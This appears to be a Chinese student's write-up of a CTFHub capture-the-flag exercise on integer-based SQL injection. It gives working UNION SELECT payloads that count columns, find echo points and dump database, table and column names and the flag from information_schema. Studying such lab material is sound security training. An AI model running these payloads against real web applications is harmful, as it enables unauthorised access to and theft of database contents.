第一阶段(2025.1.15-2025.1.27)
题目来源:CTFHub技能树。
"磨刀不误砍柴工"
所有题目的相同步骤:①整理已知信息;②联系相关信息;③用所学知识判断题型;④解题
题目一:SQL整数型注入
step 1:整理已知信息
已知本题为SQL整数型注入,故不需要进行提醒判断。
题目特点:不需要用引号进行闭合,可用联合注入查询、order by语句查询列数、需要爆数据库名、表名、列名、具体数据
step 2:查询列数,以便可以使用union select(前提:前后列数必须一致)注入
sql
1 order by 3 #
data:image/s3,"s3://crabby-images/511a5/511a52406ea1c971cf8467d76c409c990bab2931" alt=""
sql
1 order by 2 #
data:image/s3,"s3://crabby-images/bd738/bd738cb09684771f869d55fde0281234a25683bc" alt=""
可得共2个字段
step 3:进行联合注入,并查询回显点,并爆数据库名
sql
1 and 1=2 union select database(),database() #
data:image/s3,"s3://crabby-images/512bc/512bcb43fa1a71037420ed203c8753143a5dd447" alt=""
可得两个数据库名均为sqli
注:and 1=2 的作用是为了使前面的 select * from news where id=1这个查询条件不成立,直接使得后面的union操作能够正常执行
step 4:爆表名
错误示范:1 and 1=2 union select table_name from information_schema.tables where table_schema=sqli #
错误原因:sqli是字符串,需要加单引号
↓正确payload①------缺陷在于只会回显处第一个表的表名,若要爆出所有表名,需要用到limit m,n(m表示偏移量,从0开始;n表示要返回的行数)
sql
1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='sqli' #
data:image/s3,"s3://crabby-images/b28af/b28af611c89e15a8bb8d688607e5247c55649d4e" alt=""
爆第一个表名,用limit 0,1
sql
1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='sqli' limit 0,1 #
data:image/s3,"s3://crabby-images/44479/44479346038e6b33566fcaa7beb75689dada02ea" alt=""
爆第二个表名,用limit 1,1
sql
1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='sqli' limit 1,1 #
data:image/s3,"s3://crabby-images/1a53d/1a53db8500e505d0412437b00440fbe32be9cf20" alt=""
payload②------用group_concat()一次爆出所有名称
sql
1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#
data:image/s3,"s3://crabby-images/d412a/d412ace491f2ffa95ec918a8cb80c8413b4881d3" alt=""
step 5:爆列名------形如爆表名
payload①------此处只有一个列名
sql
1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#
data:image/s3,"s3://crabby-images/ef406/ef406fdf444b8c386bcac32064e240d776795027" alt=""
payload②------group_concat()
sql
1 and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag'#
data:image/s3,"s3://crabby-images/5e181/5e1816e76c2066549453acf87efae215bacb30d4" alt=""
step 6:爆具体数据
payload如下
sql
1 and 1=2 union select 1,flag from sqli.flag
data:image/s3,"s3://crabby-images/836b6/836b6a4ee0a9f2c74dd8f63a56711a08a5bf68bd" alt=""
注:这里1,flag的作用是前后两个select语句的字段保持一致,所以1,不能去掉